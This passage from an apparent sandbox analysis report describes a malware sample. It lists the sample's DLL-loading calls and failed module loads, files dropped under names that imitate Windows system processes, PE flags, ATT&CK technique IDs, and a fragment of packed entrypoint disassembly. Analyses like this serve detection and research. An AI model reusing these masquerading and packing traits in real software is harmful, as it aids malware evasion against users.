\"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004088)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004288)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004288)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003420)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003420)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002460)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002460)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002460)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002460)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002460)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002460)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003996)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002296)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002296)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002772)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002772)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004328)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004120)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004120)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004120)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004120)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004120)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003268)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006052)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006052)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001400)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001400)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001400)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001400)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003512)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003512)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002764)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002768)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002768)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002768)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002768)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002768)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002768)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004148)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004148)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004148)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004148)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004148)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004080)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003560)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003744)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003744)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003744)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003744)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003744)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003744)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003736)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003736)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4k51k4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS .exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C456.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C711.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C458.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS .exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Data HAPUBWS.exe\" file has an 